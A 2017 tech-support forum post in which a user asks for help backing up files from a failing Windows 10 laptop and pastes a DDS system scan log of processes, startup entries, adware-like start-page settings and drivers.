Author Topic: [Resolved] Problems with computer  (Read 1111 times)

Offline mommyto3furballs

  • Bronze Member
  • Posts: 190
[Resolved] Problems with computer
« on: April 13, 2017, 03:54:53 PM »
My computer is literally falling apart. I'm trying to get everything off it before i scrap it but unfortunately something is not allowing me to save my files on dvd-r, on my external hard drive (not recognising it) etc. i have a whole bunch of music on here that i don't want to lose so i'm getting beyond fustrated. please help!

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.14393.953
Run by ghy at 17:51:17 on 2017-04-13
Microsoft Windows 10 Home  10.0.14393.0.1252.1.1033.18.3911.1426 [GMT -4:00]
.
AV: Avast Antivirus *Enabled/Updated* {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Avast Antivirus *Enabled/Updated* {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\igfxCUIService.exe
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\dashost.exe
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\Program Files\Elantech\ETDService.exe
C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
C:\Program Files (x86)\Intel Driver Update Utility\SUR\SurSvc.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\system32\sihost.exe
C:\Program Files\Elantech\ETDCtrl.exe
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\System32\RuntimeBroker.exe
C:\WINDOWS\system32\igfxEM.exe
C:\WINDOWS\system32\igfxHK.exe
C:\WINDOWS\system32\igfxTray.exe
C:\Program Files\Elantech\ETDCtrlHelper.exe
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Users\ghy\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\CCleaner\CCleaner64.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\WINDOWS\system32\fontdrvhost.exe
C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeHost.exe
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgentUserBroker.exe
C:\WINDOWS\system32\svchost.exe -k SDRSVC
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8104.42387.0_x64__8wekyb3d8bbwe\HxMail.exe
C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8104.42387.0_x64__8wekyb3d8bbwe\HxTsr.exe
C:\WINDOWS\ImmersiveControlPanel\SystemSettings.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\System32\SystemSettingsBroker.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\AUDIODG.EXE
C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe
C:\Program Files (x86)\ImgBurn\ImgBurn.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\Windows\System32\smartscreen.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0ByB0D0A0DyD0AtCtCyCtN0D0Tzu0StCzytBzztN1L2XzutAtFtBzytFtAtFyDzztN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyBzyyBtDtDyCzytDtGyC0B0AyDtGtAtB0D0AtGyCzytD0EtGtCtDtAtAyC0FyEtCtBtCtDtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0ByEtDyCtD0B0FtGtAzzyE0CtGyEzy0CzztG0ByByB0CtG0Czy0A0CyByE0F0D0DyDzz0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtByCyBtB%26cr%3D266040695%26a%3Dwbf_fs_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
uLocal Page = %11%\blank.htm
mStart Page = hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0ByB0D0A0DyD0AtCtCyCtN0D0Tzu0StCzytBzztN1L2XzutAtFtBzytFtAtFyDzztN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyBzyyBtDtDyCzytDtGyC0B0AyDtGtAtB0D0AtGyCzytD0EtGtCtDtAtAyC0FyEtCtBtCtDtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0ByEtDyCtD0B0FtGtAzzyE0CtGyEzy0CzztG0ByByB0CtG0Czy0A0CyByE0F0D0DyDzz0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtByCyBtB%26cr%3D266040695%26a%3Dwbf_fs_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
uRun: [OneDrive] "C:\Users\ghy\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
uRun: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
uRun: [Chromium] c:\users\ghy\appdata\local\chromium\application\chrome.exe --auto-launch-at-startup --profile-directory=Default --restore-last-session
mRun: [iSkysoft Helper Compact.exe] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
mRun: [DelaypluginInstall] C:\ProgramData\iSkysoft\iTube Studio\DelayPluginI.exe
mExplorerRun: [BtvStack] "C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe"
mPolicies-System: DSCAutomationHostEnabled = dword:2
mPolicies-System: SoftwareSASGeneration = dword:1
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
DPF: {5AE58FCF-6F6A-49B2-B064-02492C66E3F4} - hxxp://catalog.update.microsoft.com/v7/site/ClientControl/en/x86/MuCatalogWebControl.cab?1473953425346
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{27c3b822-5058-4999-ae2f-3aa01a887b39} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{27c3b822-5058-4999-ae2f-3aa01a887b39}\1425259435D203645323 : DHCPNameServer = 216.104.96.22 216.104.98.222
TCP: Interfaces\{27c3b822-5058-4999-ae2f-3aa01a887b39}\2416E646964713 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{27c3b822-5058-4999-ae2f-3aa01a887b39}\4505D2C494E4B4F5645403638314 : DHCPNameServer = 192.168.209.1 192.168.0.1
TCP: Interfaces\{27c3b822-5058-4999-ae2f-3aa01a887b39}\7796768647D616E664333324 : DHCPNameServer = 68.69.147.20 68.69.147.40
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: WSISAllmytubechrome - {4724F5AF-4E6D-41CA - <orphaned>
AppInit_DLLs= C:\PROGRA~2\Sophos\SOPHOS~1\\SOPHOS~1.DLL
SSODL: WebCheck - <orphaned>
LSA: Security Packages =  ""
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-mStart Page = hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0ByB0D0A0DyD0AtCtCyCtN0D0Tzu0StCzytBzztN1L2XzutAtFtBzytFtAtFyDzztN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyBzyyBtDtDyCzytDtGyC0B0AyDtGtAtB0D0AtGyCzytD0EtGtCtDtAtAyC0FyEtCtBtCtDtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0ByEtDyCtD0B0FtGtAzzyE0CtGyEzy0CzztG0ByByB0CtG0Czy0A0CyByE0F0D0DyDzz0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtByCyBtB%26cr%3D266040695%26a%3Dwbf_fs_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
x64-Run: [ETDCtrl] C:\Program Files (x86)\Elantech\ETDCtrl.exe
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-Run: [AvastUI.exe] "C:\Program Files\AVAST Software\Avast\AvLaunch.exe" /gui
x64-ExplorerRun: [BtvStack] "C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe"
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-mPolicies-System: SoftwareSASGeneration = dword:1
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: WSISAllmytubechrome - {4724F5AF-4E6D-41CA - <orphaned>
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
============= SERVICES / DRIVERS ===============
.
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2016-7-16 48152]
R0 iorate;iorate;C:\WINDOWS\System32\drivers\iorate.sys [2016-11-9 48992]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2016-7-16 16224]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2016-7-16 107032]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2016-7-16 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2016-8-23 199008]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2016-10-28 227328]
R1 aswbidsdriver;aswbidsdriver;C:\WINDOWS\System32\drivers\aswbidsdrivera.sys [2017-2-10 307736]
R1 aswKbd;aswKbd;C:\WINDOWS\System32\drivers\aswKbd.sys [2017-1-30 32600]
R1 aswSnx;aswSnx;C:\WINDOWS\System32\drivers\aswSnx.sys [2017-1-30 1005048]
R1 aswSP;aswSP;C:\WINDOWS\System32\drivers\aswSP.sys [2017-1-30 556784]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2016-7-16 88576]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2016-7-16 8192]
R1 SASDIFSV;SASDIFSV;C:\Program Files\SUPERAntiSpyware\sasdifsv64.sys [2011-7-22 14928]
R1 SASKUTIL;SASKUTIL;C:\Program Files\SUPERAntiSpyware\saskutil64.sys [2011-7-12 12368]
R2 !SASCORE;SAS Core Service;C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [2014-7-22 173472]
R2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2017-3-17 83768]
R2 aswMonFlt;aswMonFlt;C:\WINDOWS\System32\drivers\aswMonFlt.sys [2017-1-30 127112]
R2 AtherosSvc;AtherosSvc;C:\Program Files (x86)\Bluetooth Suite\AdminService.exe [2013-9-7 312448]
R2 avast! Antivirus;Avast Antivirus;C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2017-4-4 261712]
R2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R2 CDPUserSvc_20bc5;CDPUserSvc_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 clreg;Virtual Registry for Containers;C:\WINDOWS\System32\drivers\registry.sys [2016-7-16 70144]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2016-7-16 44496]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc [2016-7-16 44496]
R2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 ETDService;Elan Service;C:\Program Files\Elantech\ETDService.exe [2015-10-7 144072]
R2 igfxCUIService1.0.0.0;Intel(R) HD Graphics Control Panel Service;C:\WINDOWS\System32\igfxCUIService.exe [2016-5-12 319096]
R2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [2016-3-16 209184]
R2 OneSyncSvc_20bc5;Sync Host_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 ss_conn_service;SAMSUNG Mobile Connectivity Service;C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [2016-8-15 754784]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2016-7-16 78336]
R2 SystemUsageReportSvc_WILLAMETTE;Intel(R) System Usage Report Service SystemUsageReportSvc_WILLAMETTE;C:\Program Files (x86)\Intel Driver Update Utility\SUR\SurSvc.exe [2016-3-9 118424]
R2 tiledatamodelsvc;Tile Data model server;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2016-9-29 119648]
R2 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2016-7-16 66560]
R2 WpnService;Windows Push Notifications System Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 aswbIDSAgent;aswbIDSAgent;C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2017-4-4 7398336]
R3 b57xdbd;Broadcom xD Picture Bus Driver Service;C:\WINDOWS\System32\drivers\b57xdbd.sys [2013-7-10 72912]
R3 b57xdmp;Broadcom xD Picture vstorp client drv;C:\WINDOWS\System32\drivers\b57xdmp.sys [2013-7-10 25296]
R3 bScsiMSa;bScsiMSa;C:\WINDOWS\System32\drivers\bScsiMSa.sys [2013-7-23 59088]
R3 bScsiSDa;bScsiSDa;C:\WINDOWS\System32\drivers\bScsiSDa.sys [2013-7-19 82128]
R3 BTATH_BUS;Qualcomm Atheros Bluetooth Bus;C:\WINDOWS\System32\drivers\btath_bus.sys [2013-9-7 34384]
R3 ETD;ELAN Input Device;C:\WINDOWS\System32\drivers\ETD.sys [2015-10-7 525512]
R3 IntcDAud;Intel(R) Display Audio;C:\WINDOWS\System32\drivers\IntcDAud.sys [2015-8-21 463112]
R3 Intel(R) Security Assist;Intel(R) Security Assist;C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [2016-3-2 335872]
R3 iwdbus;IWD Bus Enumerator;C:\WINDOWS\System32\drivers\iwdbus.sys [2015-12-1 38896]
R3 k57nd60a;Broadcom NetLink (TM) Gigabit Ethernet - NDIS 6.0;C:\WINDOWS\System32\drivers\k57nd60a.sys [2016-7-16 446464]
R3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [2016-2-24 192216]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2016-7-16 20480]
R3 PimIndexMaintenanceSvc_20bc5;Contact Data_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
R3 UnistoreSvc_20bc5;User Data Storage_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 UserDataSvc_20bc5;User Data Access_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S2 isaHelperSvc;Intel(R) Security Assist Helper;C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [2016-3-2 8704]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService [2016-7-16 44496]
S2 Update service;Update service;C:\Program Files (x86)\Popcorn Time\Updater.exe [2016-12-27 339968]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2016-7-16 18432]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2016-7-16 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2016-7-16 15360]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2016-7-16 44496]
S3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
S3 aswHwid;aswHwid;C:\WINDOWS\System32\drivers\aswHwid.sys [2017-1-30 38296]
S3 bcmfn;bcmfn Service;C:\WINDOWS\System32\drivers\bcmfn.sys [2016-7-16 9728]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2016-7-16 9728]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2016-7-16 44496]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2016-7-16 38912]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2016-10-28 118272]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2016-7-16 346976]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2016-7-16 2104160]
S3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 dg_ssudbus;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.);C:\WINDOWS\System32\drivers\ssudbus.sys [2016-4-25 130688]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2016-7-16 93184]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 ESRV_SVC_WILLAMETTE;Energy Server Service WILLAMETTE;C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe [2016-6-19 416408]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2016-7-16 44496]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2016-7-16 20480]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2016-7-16 50016]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2016-7-16 33280]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2016-7-16 81408]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2016-7-16 64512]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2016-7-16 176384]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2016-7-16 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2016-7-16 113152]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2016-7-16 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2016-7-16 526176]
S3 ICCS;Intel(R) Integrated Clock Controller Service - Intel(R) ICCS;C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe [2016-6-19 169752]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2016-7-16 35840]
S3 intaud_WaveExtensible;Intel WiDi Audio Device;C:\WINDOWS\System32\drivers\intelaud.sys [2015-12-1 50160]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface;C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [2016-2-19 974632]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2016-7-16 105824]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2016-7-16 101216]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2016-10-12 64352]
S3 MessagingService_20bc5;MessagingService_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2016-7-16 842584]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2016-7-16 108896]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2016-7-16 90624]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2016-7-16 58720]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2016-7-16 61792]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2016-7-16 928608]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2016-7-16 88416]
S3 scmdisk0101;Microsoft NVDIMM-N disk driver;C:\WINDOWS\System32\drivers\scmdisk0101.sys [2016-7-16 123904]
S3 semav6msr64;semav6msr64;C:\WINDOWS\System32\drivers\semav6msr64.sys [2016-6-19 21984]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2017-3-15 1312768]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2016-7-16 151904]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2016-7-16 44496]
S3 ssudmdm;SAMSUNG  Mobile USB Modem Drivers (DEVGURU Ver.);C:\WINDOWS\System32\drivers\ssudmdm.sys [2016-8-15 164992]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2016-9-29 81760]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2016-7-16 32096]
